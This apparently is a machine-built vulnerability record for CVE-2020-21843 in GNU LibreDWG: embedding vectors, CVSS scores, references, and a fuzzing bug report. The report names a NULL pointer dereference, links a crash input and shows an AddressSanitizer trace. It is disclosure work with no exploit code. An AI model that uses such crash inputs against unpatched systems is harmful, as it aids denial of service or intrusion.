-0.007037341129034758, -0.02061758190393448, 0.0159305352717638, -0.03226746246218681, 0.001241186517290771, 0.034624531865119934, 0.0031055063009262085, 0.014386249706149101, -0.006634336896240711, -0.005946858320385218, 0.012205283157527447, 0.011236716993153095, 0.002257164567708969, 0.0015806924784556031, -0.007978814654052258, -0.015063568018376827, -0.0091234827414155, 0.009062523953616619, -0.03037097118794918, -0.01289614848792553, 0.039528317749500275, -0.019276490435004234, 0.014250785112380981, 0.016634946689009666, -0.01541577372699976, 0.014467527158558369, -0.002086141612380743, -0.011588922701776028, -0.0020065566059201956, -0.011135119013488293, -0.017352905124425888, -0.01194112841039896, 0.009137029759585857, -0.008168463595211506, -0.00029357531457208097, 0.006207625847309828, -0.0011362021323293447, 0.014657177031040192, -0.01400695089250803, -0.011013202369213104, 0.008148143999278545, 0.00967211090028286, 0.014738455414772034, -0.02092914842069149, -0.006366795860230923, 0.023936443030834198, 0.016228556632995605, 0.017813481390476227, 0.0142372390255332, 0.00046269333688542247, 0.0019693041685968637, 0.007376000750809908, 0.007843350991606712, 0.006200852803885937, -0.005885899532586336, -0.0013529440620914102, 0.002316429978236556, 0.01816568709909916, 0.00600443035364151, -0.006678362376987934, 0.01227978803217411, 0.013695384375751019, -0.0005799541249871254, -0.009035431779921055, 0.023841617628932, 0.006719001568853855, 0.009028658270835876, -0.004680272191762924, -0.0029107772279530764, 0.0012462664162740111, 0.0062753576785326, 0.009482461959123611, 0.008209102787077427, 0.008933833800256252, -0.004592220764607191, 0.03064189851284027, -0.008391979150474072, -0.00994303822517395, 0.006756254006177187, -0.009746615774929523, -0.007714659906923771, -0.025819389149546623, -0.002660169266164303, -0.00272959447465837, -0.02764814905822277, 0.002849818440154195, 0.01697360724210739, 0.008886421099305153, -0.016689132899045944, -0.0023147366009652615, -0.0059502446092665195, -0.00967211090028286, -0.02473567984998226, -0.00200824998319149, 0.0021606467198580503, -0.013647971674799919, -0.008574854582548141, -0.011297675780951977, -0.014481074176728725, 0.0023977081291377544, -0.0019015722209587693, -0.009055751375854015, 0.03608753904700279, -0.01255748886615038, -0.02619868703186512, -0.030262598767876625, 0.0009694123873487115, 0.0010862498311325908, 0.016607854515314102, 0.027079202234745026, -0.023462319746613503, 0.015131299383938313, 0.009733069688081741, 0.0016196382930502295, 0.009678884409368038, -0.012963879853487015, -0.009048977866768837, -0.0084935761988163, -0.00045888341264799237, 0.011365408077836037, 0.013200941495597363, 0.022351516410708427, -0.020035088062286377, 0.013194167986512184, 0.006481939926743507, 0.012408478185534477, 0.0056962501257658005, -0.014494620263576508, -0.0032849956769496202, 0.008669679053127766, 0.003014068119227886, 0.006163600366562605, 0.0002565344620961696, 0.02189094014465809, 0.002446813741698861, 0.00312243914231658, 0.01137218065559864, 0.008215876296162605, 0.002602597000077367, -0.0008669679518789053, -0.01784057542681694, -0.004433050751686096, 0.029720744118094444, 0.003403526498004794, 0.016919421032071114, 0.008249741978943348, 0.005631905049085617, 0.008188783191144466, -0.007287949323654175, 0.04109969735145569, 0.004304360132664442, -0.022175414487719536, 0.0004872461431659758, -0.0036913868971168995, 0.009231854230165482, 0.02492532879114151, 0.002824418945237994, 0.0251962561160326, 0.008256514556705952, -0.00485637504607439, 0.006194079760462046, 0.030939918011426926, -0.006471780128777027, -0.01514484640210867, -0.013749569654464722, 0.0125507153570652, -0.013275446370244026, -0.010606810450553894, -0.029666559770703316, -0.039474133402109146, 0.026361243799328804, 0.005554013419896364, -0.0030123749747872353, -0.0011209624353796244, -0.008053319528698921, -0.000302041822578758, 0.029937487095594406, 0.021349085494875908, 0.004883467685431242, -0.0031190526206046343, 0.00046607994590885937, -0.0012428797781467438, -0.0006019669817760587, 0.011026748456060886, -0.005049410741776228, 0.024627307429909706, 0.012977425940334797, -0.01477909367531538, -0.011521191336214542, 0.017786389216780663, 0.007795938290655613, -0.015442866832017899, -0.010776140727102757, 0.0030580938328057528, 0.00940118357539177, 0.0019134252797812223, 0.005408389959484339, -0.0031715447548776865, 0.0005570946377702057, -0.0041519636288285255, 0.008859328925609589, 0.00023219331342261285, 0.018761727958917618, -0.0069425166584551334, 0.01196144800633192, -0.002760073635727167, 0.004578674212098122, 0.002370615489780903, -0.0058113946579396725, -0.017312265932559967, -0.01078291330486536, -0.011683747172355652, 0.010098821483552456, 0.01049166638404131, 0.0013292379444465041, -0.006173760164529085, 0.019127480685710907, 0.018924284726381302, 0.01979125291109085, 0.01629628799855709, -0.010302017442882061, -0.017542554065585136, 0.01454880554229021, 0.030398063361644745 ]
CVE-2020-21843
2021-05-17T22:15:07.437000
A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via bit_read_RC ../../src/bits.c:318.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493857" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493857
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.017635544762015343, 0.021618720144033432, -0.0045865741558372974, 0.01542925089597702, 0.05105571821331978, 0.0540764145553112, -0.017472663894295692, 0.044955093413591385, -0.018731288611888885, 0.027808189392089844, -0.011712607927620411, 0.0010781596647575498, 0.012090194970369339, 0.012386342510581017, -0.011075892485678196, 0.014451966620981693, -0.003398285014554858, 0.008070001378655434, -0.023129068315029144, -0.027423199266195297, 0.02773415297269821, -0.005626790225505829, -0.017502278089523315, 0.020819123834371567, -0.02506883069872856, 0.004331147763878107, -0.006022886373102665, -0.007759047672152519, -0.018153801560401917, 0.01723574660718441, 0.013859672471880913, 0.022151784971356392, 0.01802053675055504, 0.0008583631133660674, 0.037432961165905, -0.010453984141349792, 0.04400742053985596, 0.060265883803367615, 0.013074883259832859, 0.03447149321436882, 0.0055527533404529095, -0.07374056428670883, -0.02150026150047779, 0.01434091106057167, -0.011838470585644245, -0.009165745228528976, 0.029318537563085556, 0.01633249968290329, -0.013074883259832859, -0.0020175003446638584, -0.011460883542895317, -0.01739862747490406, -0.035359933972358704, -0.07385902851819992, 0.04273398965597153, -0.01772438921034336, 0.0334053635597229, 0.021944481879472733, 0.004712436813861132, -0.006459703203290701, -0.018109379336237907, 0.030710428953170776, -0.0034778746776282787, 0.027556464076042175, 0.0066707078367471695, 0.020922774448990822, -0.04030558839440346, 0.007647992577403784, -0.027808189392089844, -0.005515735130757093, 0.004334849771112204, -0.04501432180404663, -0.004734647925943136, 0.027349160984158516, 0.021766792982816696, -0.00689281802624464, 0.011527515947818756, 0.0116978008300066, -0.016628645360469818, 0.022966187447309494, -0.013052672147750854, 0.04255630075931549, -0.03524147719144821, 0.017635544762015343, 0.007640588562935591, 0.006152451038360596, -0.022048132494091988, -0.08398724347352982, -0.006115432363003492, -0.045280855149030685, -0.004527344834059477, 0.03085850179195404, 0.0245357658714056, -0.009017671458423138, 0.01739862747490406, -0.01116473600268364, -0.0397132933139801, -0.0175170861184597, -0.04800540581345558, -0.011179544031620026, -0.038351017981767654, -0.005497226025909185, -0.011231369338929653, 0.011394250206649303, 0.032072704285383224, 0.018523985520005226, 0.003274273592978716, -0.016554608941078186, 0.005737845320254564, 0.11324655264616013, 0.0016741551226004958, -0.008543836884200573, -0.03894330933690071, -0.006200574804097414, -0.007159349974244833, 0.009373048320412636, 0.03737373277544975, -0.008055194281041622, -0.057393260300159454, -0.02429884858429432, 0.0013789337826892734, -0.03216154873371124, -0.028430098667740822, 0.0038869273848831654, -0.048360779881477356, 0.036218758672475815, 0.0063301390036940575, -0.01732459105551243, -0.022877344861626625, -0.013104498386383057, -0.02450615167617798, -0.03642606362700462, 0.01760593056678772, -0.020671050995588303, 0.010557635687291622, 0.0044792210683226585, -0.029925638809800148, 0.031243493780493736, 0.016480572521686554, 0.0055527533404529095, -0.057067498564720154, -0.041667863726615906, 0.03358305245637894, -0.010616865009069443, -0.02995525486767292, 0.00038406543899327517, -0.04240822792053223, 0.011394250206649303, 0.00218593399040401, -0.01132761687040329, -0.01732459105551243, -0.02474306896328926, 0.010120818391442299, 0.031954243779182434, 0.04252668842673302, -0.019975105300545692, 0.020182408392429352, 0.04545854032039642, 0.009099111892282963, -0.025912849232554436, 0.018538793548941612, -0.030591970309615135, 0.025883235037326813, -0.03618914633989334, -0.025379784405231476, -0.0003556075971573591, 0.0175170861184597, 0.022433124482631683, -0.00620797835290432, 0.025290941819548607, 0.0009138906607404351, -0.01670268177986145, 0.027349160984158516, 0.017857655882835388, -0.058992452919483185, 0.0027486130129545927, -0.01175703015178442, 0.020715471357107162, -0.014170627109706402, -0.013178534805774689, 0.003920244053006172, 0.007388864178210497, 0.018953397870063782, -0.0010957433842122555, 0.017220938578248024, 0.004171968903392553, 0.031125033274292946, -0.005445400252938271, -0.006792868487536907, -0.0347084105014801, 0.00416456488892436, -0.009484102949500084, 0.00426821643486619, -0.023380793631076813, 0.04086826369166374, -0.019190315157175064, -0.040275972336530685, -0.01621404103934765, 0.00989130511879921, -0.011808855459094048, 0.007677607238292694, 0.011253580451011658, -0.01998991332948208, 0.01481474656611681, -0.0063116298988461494, 0.002097090007737279, -0.014799938537180424, 0.04649505391716957, -0.0014918397646397352, -0.03189501538872719, -0.013208149932324886, -0.03384958580136299, 0.017798425629734993, -0.005156657192856073, -0.0258980430662632, 0.003276124596595764, -0.015577324666082859, 0.029362959787249565, -0.03512301668524742, 0.0008810368599370122, 0.02761569432914257, -0.021781601011753082, 0.007544341031461954, 0.0029855305328965187, -0.07836046069860458, -0.010824167169630527, 0.00787750631570816, 0.010498405434191227, -0.045488156378269196, 0.004716138821095228, 0.03604107350111008, -0.029925638809800148, -0.008055194281041622, 0.018494371324777603, -0.025986885651946068, -0.01027629617601633, -0.002781929448246956, 0.014215049333870411, -0.03023659437894821, 0.017457857728004456, 0.022847728803753853, 0.02520209737122059, -0.01756150834262371, -0.017828039824962616, 0.010972240939736366, 0.04640621319413185, -0.009402662515640259, -0.004186776001006365, -0.029066814109683037, 0.027645308524370193, 0.00972842425107956, -0.030621584504842758, 0.007722028996795416, 0.022373894229531288, 0.013778232038021088, -0.010453984141349792, 0.027971070259809494, 0.018731288611888885, -0.014437158592045307, -0.03731450438499451, 0.03764026612043381, 0.0012105002533644438, -0.012282690964639187, -0.0009745082352310419, 0.0073851621709764, -0.016480572521686554, -0.030562354251742363, 0.02166314236819744, -0.018435141071677208, -0.028859511017799377, 0.04649505391716957, -0.014081782661378384, -0.002367323962971568, -0.006881712470203638, -0.025128060951828957, 0.008188460022211075, 0.04116441309452057, 0.002632005140185356, -0.004457009956240654, 0.0015168271493166685, -0.001263251411728561, 0.027586080133914948, -0.019131086766719818, 0.010631672106683254, -0.0091953594237566, -0.01842033490538597, -0.009869094006717205, -0.02909642830491066, -0.03204308822751045, -0.009550736285746098, -0.0006811377825215459, 0.008121827617287636, -0.05372104048728943, -0.0035907805431634188, -0.01284536998718977, 0.03885446861386299, 0.01372640673071146, -0.012341920286417007, -0.0558236800134182, -0.0003838340926449746, -0.021885251626372337, -0.011949525214731693, -0.021278150379657745, -0.019116278737783432, -0.02075989358127117, -0.0022173996549099684, -0.017739197239279747, 0.020448939874768257, -0.017428241670131683, -0.007803469430655241, 0.01994549110531807, -0.04862731322646141, -0.008995460346341133, -0.029614685103297234, -0.02560189552605152, -0.007037189789116383, 0.015577324666082859, -0.04670235887169838, -0.01126098446547985, 0.0024191495031118393, -0.043474357575178146, -0.004712436813861132, -0.03319806233048439, 0.006319033447653055, 0.03956522047519684, -0.03879523649811745, 0.006256102118641138, 0.04945652559399605, -0.05401718616485596, 0.023617710918188095, 0.014577828347682953, -0.018198223784565926, -0.004786473698914051, -0.015059067867696285, -0.003616693429648876, -0.04886423051357269, -0.051233407109975815, 0.023691747337579727, 0.016806334257125854, -0.003577824216336012, -0.012060580775141716, 0.02569073997437954, 0.0020933880005031824, -0.006289418786764145, 0.007914524525403976, -0.029599877074360847, 0.008817772381007671, -0.02043413184583187, 0.01957530714571476, -0.010572442784905434, 0.001022632117383182, 0.04927883669734001, -0.020419325679540634, 0.037906795740127563, -0.0010522467782720923, -0.028578171506524086, 0.003118796506896615, -0.04732426628470421, 0.012467782013118267, -0.0033723723609000444, 0.0028522643260657787, -0.013422856107354164, 0.0003923945769201964, 0.0032502117101103067, 0.011416461318731308, 0.011927314102649689, 0.008403167128562927, 0.00558236800134182, -0.003255764488130808, -0.0008315248414874077, -0.03450110927224159, 0.055379461497068405, -0.03799564018845558, -0.029185272753238678, -0.018598021939396858, -0.02622380293905735, 0.024846721440553665, 0.02335117943584919, -0.033671896904706955, 0.004249707330018282, -0.042200926691293716, -0.009943130426108837, -0.002715296344831586, -0.0361299142241478, 0.029925638809800148, 0.034293804317712784, -0.022018518298864365, 0.0387360081076622, -0.02323272079229355, -0.02900758385658264, -0.008521625772118568, 0.06527076661586761, -0.006952047348022461, -0.0461396798491478, 0.011394250206649303, 0.04160863161087036, -0.010587249882519245, -0.004804982803761959, 0.008869598619639874, -0.03423457592725754, -0.019545692950487137, 0.012201250530779362, -0.01454821415245533, -0.009595157578587532, 0.02052297629415989, 0.034738026559352875, 0.009861689992249012, -0.014215049333870411, 0.018287068232893944, 0.013978131115436554, 0.003359415801241994, -0.018642444163560867, -0.002532055601477623, 0.005956253502517939, 0.05280298367142677, 0.014888782985508442, -0.0077886623330414295, 0.014970223419368267, -0.014289085753262043, -0.010091204196214676, 0.0025709248147904873, -0.0120235625654459, 0.012830561958253384, 0.011320213787257671, 0.007233386859297752, 0.023617710918188095, -0.012778736650943756, 0.01670268177986145, 0.01649538055062294, -0.036218758672475815, -0.003015145193785429, 0.024180389940738678, 0.007129735313355923, 0.03337575122714043, -0.02253677509725094, -0.043237440288066864, -0.01855359971523285, -0.025794390588998795, -0.008914019912481308, 0.0072000701911747456, 0.002261821646243334, 0.044510871171951294, -0.02409154549241066, -0.0045865741558372974, -0.012179039418697357, -0.029807180166244507, -0.04658389836549759, 0.003672220977023244, 0.015695782378315926, -0.039831750094890594, 0.0013271081261336803, 0.030029291287064552, -0.03627799078822136, 0.001967525575309992, 0.0033057392574846745, -0.01876090280711651, -0.05226992070674896, 0.003544507548213005, 0.02877066656947136, 0.008728928864002228, -0.01165337860584259, 0.01973818801343441, -0.024032317101955414, -0.004856808576732874, 0.02055259235203266, 0.037284888327121735, 0.04634698107838631, -0.03968367725610733, 0.0017972411587834358, -0.0058933221735060215, -0.013867076486349106, 0.01862763613462448, 0.017842847853899002, -0.00853643286973238, 0.001676006126217544, 0.020078755915164948, -0.024683840572834015, 0.004027597140520811, -0.010320717468857765, -0.011801452375948429, 0.00423860177397728, -0.040809035301208496, -0.004642101936042309, -0.028296831995248795, 0.0270382072776556, -0.02117449976503849, 0.052388377487659454, 0.015295985154807568, 0.024032317101955414, 0.041875164955854416, -0.0033353539183735847, 0.016199233010411263, -0.026860520243644714, -0.04948613792657852, 0.0023229019716382027, 0.030014483258128166, -0.013311800546944141, -0.03521186113357544, 0.040364816784858704, 0.020004719495773315, 0.02884470298886299, -0.0007135288324207067, 0.02663840912282467, 0.00009254588803742081, 0.03390881419181824, -0.016406536102294922, -0.029066814109683037, 0.0017805829411372542, -0.001471479656174779, -0.035567235201597214, 0.010535424575209618, -0.023825014010071754, 0.0025709248147904873, -0.0571267269551754, -0.0076553961262106895, -0.01661383919417858, 0.0019453145796433091, 0.008499414660036564, 0.00995053444057703, 0.009654387831687927, -0.01649538055062294, -0.031213877722620964, -0.004930844996124506, 0.04652466997504234, 0.015096086077392101, 0.014326103962957859, -0.00355931487865746, -0.007240790408104658, 0.022758886218070984, -0.014244663529098034, -0.0034056887961924076, -0.0032372553832829, -0.012356727384030819, 0.03725527226924896, -0.009380451403558254, 0.015903085470199585, -0.011497901752591133, 0.030132941901683807, 0.007188964635133743, -0.016317691653966904, -0.019427234306931496, 0.025024408474564552, -0.036870282143354416, 0.0007491589640267193, -0.015458866022527218, 0.017369013279676437, -0.019915875047445297, 0.034945327788591385, 0.0021174498833715916, -0.012142021209001541, -0.004486624617129564, -0.006604074966162443, -0.0026190488133579493, 0.00045116120600141585, -0.006285716779530048, 0.009646983817219734, -0.00453474884852767, -0.0006154301809147, 0.029436996206641197, 0.005649001337587833, 0.02096719667315483, -0.0005168687785044312, 0.023854628205299377, -0.004375569522380829, 0.013171130791306496, 0.004408886190503836, -0.017457857728004456, 0.029126042500138283, -0.03758103400468826, -0.031332336366176605, 0.03384958580136299, 0.02182602323591709, 0.01690998487174511, -0.021233730018138885, -0.022596005350351334, 0.005452803801745176, -0.025142867118120193, -0.005404680036008358, -0.0014066975563764572, -0.031658098101615906, 0.01340064499527216, -0.047294653952121735, -0.011379443109035492, 0.016554608941078186, 0.013763424940407276, -0.025024408474564552, 0.008003368973731995, -0.017250554636120796, 0.03402727469801903, -0.01126838754862547, 0.005682317540049553, -0.00962477270513773, -0.0015223799273371696, -0.00331314280629158, 0.031125033274292946, 0.005922936834394932, 0.0005043750861659646, 0.013482085429131985, -0.009091708809137344, 0.003109541954472661, -0.013393240980803967, 0.015606938861310482, 0.017828039824962616, -0.02022683061659336, -0.03343497961759567, -0.0009671045700088143, 0.012290094047784805, -0.005711932200938463, -0.0240471251308918, 0.016806334257125854, 0.03447149321436882, 0.0014446413842961192, 0.07089755684137344, -0.002726401900872588, 0.020878352224826813, -0.00038730454980395734, 0.0011799600906670094, 0.010735323652625084, -0.024358078837394714, 0.010528020560741425, 0.016436150297522545, -0.04226015508174896, 0.013741213828325272, 0.020093563944101334, 0.015399636700749397, 0.032398466020822525, 0.007474006153643131, -0.023958280682563782, -0.011024066247045994, -0.005604579113423824, -0.027053015306591988, 0.01846475712954998, 0.012230864726006985, -0.02224062941968441, -0.0208931602537632, 0.03550800681114197, 0.046880047768354416, 0.008136634714901447, -0.014577828347682953, 0.013985535129904747, 0.011157332919538021, 0.00020626165496651083, -0.009432277642190456, 0.013741213828325272, -0.02766011655330658, -0.005389872472733259, 0.000582113629207015, 0.01802053675055504, 0.021070849150419235, 0.03467879816889763, -0.026031307876110077, -0.014333507977426052, 0.0008116274839267135, 0.019471654668450356, 0.019101472571492195, -0.01579943485558033, 0.02585362084209919, 0.038351017981767654, -0.0037740215193480253, 0.007111226208508015, 0.007270405068993568, -0.013970728032290936, -0.03530070558190346, 0.0010013465071097016, -0.011771837249398232, 0.00160011847037822, -0.03947637602686882, -0.0012854624073952436, 0.020611820742487907, 0.01953088492155075, -0.0017167262267321348, -0.021248536184430122, 0.006663304287940264, -0.0009597009047865868, -0.011438672430813313, -0.00279118400067091, 0.0037240467499941587, 0.014970223419368267, -0.030710428953170776, 0.0055342442356050014, -0.004804982803761959, -0.002848562551662326, -0.0004840150068048388, 0.004090528469532728, -0.030058905482292175, 0.01066869031637907, -0.007736836560070515, -0.01066869031637907, -0.021737178787589073, -0.032102320343256, 0.020611820742487907, 0.0004611099138855934, 0.01772438921034336, 0.004549555946141481, 0.02617938257753849, -0.017783617600798607, 0.041342101991176605, -0.022388702258467674, -0.02478749118745327, 0.004342253319919109, -0.023247526958584785, -0.0006177438190206885, 0.008625277318060398, -0.008403167128562927, 0.012815754860639572, 0.010224469937384129, -0.00787750631570816, -0.010231873951852322, 0.032813072204589844, 0.0052306936122477055, -0.024017509073019028, -0.0005145551403984427, -0.03864716365933418, -0.018908975645899773, 0.00465690903365612, -0.016302883625030518, 0.013719002716243267, 0.0022747779730707407, -0.0033538630232214928, 0.009365644305944443, -0.012452974915504456, -0.014762920327484608, 0.00002297740866197273, -0.04320782423019409, 0.008832579478621483, -0.013348819687962532, 0.006322735454887152, -0.008403167128562927, -0.01100185513496399, 0.009632176719605923, 0.009299010969698429, -0.019057050347328186, 0.005652702879160643, 0.014311296865344048, -0.02798587828874588, 0.004834597464650869, 0.008684506639838219, -0.019708573818206787, 0.01497762743383646, 0.004075720906257629, 0.0036481590941548347, 0.00010613857011776417, 0.0061783636920154095, -0.020671050995588303, -0.008647488430142403, -0.0049715652130544186, 0.010209662839770317, 0.016065966337919235, -0.0183907188475132, 0.02757127210497856, 0.0077886623330414295, 0.008277304470539093, 0.023454830050468445, -0.040275972336530685, -0.010172644630074501, -0.01568097621202469, 0.03192463144659996, -0.031983859837055206, -0.007263001520186663, -0.013097094371914864, -0.029155656695365906, 0.010964836925268173, -0.011149928905069828, 0.03278345614671707, 0.03233923763036728, -0.0005890546017326415, 0.016051160171628, -0.030384667217731476, 0.015873471274971962, 0.008506818674504757, 0.03328690677881241, -0.008343937806785107, -0.00037226584390737116, -0.0045754690654575825, 0.019190315157175064, -0.0221962071955204, 0.009424873627722263, 0.005197377409785986, 0.0255722813308239, 0.02576477639377117, -0.015814241021871567, -0.014437158592045307, -0.02971833571791649, 0.023454830050468445, 0.011942122131586075, -0.007444391492754221, 0.03384958580136299, -0.014266874641180038, -0.000733888940885663, -0.002026755129918456, -0.005793372634798288, -0.024861527606844902, 0.039831750094890594, -0.01516271848231554, -0.009002864360809326, -0.03358305245637894, 0.023040225729346275, 0.025720354169607162, -0.0009000087738968432, -0.02277369238436222, 0.03028101474046707, -0.006570758298039436, -0.033257290720939636, -0.02449134550988674, -0.007007574662566185, -0.023943472653627396, -0.04489586129784584, 0.03512301668524742, -0.024698646739125252, 0.026046115905046463, -0.006137643475085497, -0.009506314061582088, 0.018938591703772545, 0.03778833895921707, -0.0043089366517961025, 0.0026005394756793976, 0.0018971908139064908, -0.017739197239279747, 0.0012502949684858322, 0.003474172670394182, -0.030295822769403458, 0.001679707900620997, -0.008188460022211075, -0.05988089367747307, -0.007751643657684326, -0.03692951425909996, -0.0012558477465063334, 0.011942122131586075, 0.034204959869384766, 0.006000675726681948, 0.001958271022886038, -0.002346963854506612, -0.017220938578248024, 0.002054518787190318, 0.007455497048795223, 0.026371877640485764, 0.023321565240621567, -0.011083295568823814, -0.0021933375392109156, 0.04667274281382561, -0.0258980430662632, -0.005782267078757286, -0.015221947804093361, -0.010305910371243954, -0.021766792982816696, -0.025986885651946068, -0.024802299216389656, 0.005241799168288708, 0.011749626137316227, 0.007396267727017403, 0.043444741517305374, 0.028741052374243736, -0.012401149608194828, -0.0068224831484258175, -0.00995053444057703, 0.012593644671142101, 0.00832912977784872, -0.0034390052314847708, -0.0005006732535548508, -0.011305405758321285, 0.032398466020822525, -0.005822987295687199, -0.0059895701706409454, -0.00587851507589221, 0.0025061427149921656, 0.015444057993590832, -0.015991929918527603, -0.03296114504337311, 0.0008370775613002479, -0.013941112905740738, -0.035596851259469986, -0.023913858458399773, 0.016880370676517487, 0.008603066205978394, -0.02379539981484413, -0.032724227756261826, -0.011335020884871483, -0.013585736975073814, 0.023499252274632454, 0.030710428953170776, -0.012423360720276833, -0.005134446080774069, -0.001320629846304655, 0.03216154873371124, 0.01313411258161068, -0.07913044095039368, 0.012090194970369339, -0.019471654668450356, -0.011586745269596577, -0.01805015094578266, 0.004827193915843964, 0.027689730748534203, -0.05043380707502365, -0.031954243779182434, 0.03248731046915054, 0.03879523649811745, -0.0030503126326948404, -0.018938591703772545, -0.029288923367857933, -0.0074666026048362255, -0.013881883583962917, -0.003383477684110403, 0.03464918211102486, -0.02543901465833187, 0.0038906291592866182, -0.018272260203957558, 0.03130272403359413, -0.0003630112623795867, 0.00758135924115777, 0.025587087497115135, 0.019915875047445297, -0.005719336215406656, 0.0003738854138646275, -0.03843986243009567, -0.02166314236819744, -0.002972573973238468, -0.041845548897981644, -0.0009856137912720442, 0.0212189219892025, 0.06432309746742249, 0.012452974915504456, -0.009780249558389187, -0.032724227756261826, 0.012038369663059711, -0.007588763255625963, -0.03094734624028206, -0.03482687100768089, 0.0110981035977602, -0.0006927059730514884, 0.002519099274650216, 0.003994280472397804, -0.008765947073698044, 0.013023057952523232, 0.012060580775141716, 0.029185272753238678, 0.008351340889930725, 0.006363455671817064, 0.004353358875960112, -0.008928827941417694, -0.039831750094890594, -0.016806334257125854, 0.015769820660352707, 0.02847451902925968, -0.018435141071677208, 0.000884738692548126, 0.0027097437996417284, 0.002206294098868966, -0.01388928759843111, -0.012378938496112823, -0.011468286626040936, -0.014044764451682568, -0.01760593056678772, -0.003535252995789051, -0.012275286950170994, -0.010950029827654362, 0.019057050347328186, -0.019960297271609306, -0.011623763479292393, -0.002706041792407632, 0.025187289342284203, 0.004312638659030199, 0.02318829856812954, -0.02038971148431301, -0.019382812082767487, 0.005974762607365847, 0.032398466020822525, -0.04445164278149605, -0.013445067219436169, -0.02269965596497059, -0.020078755915164948, 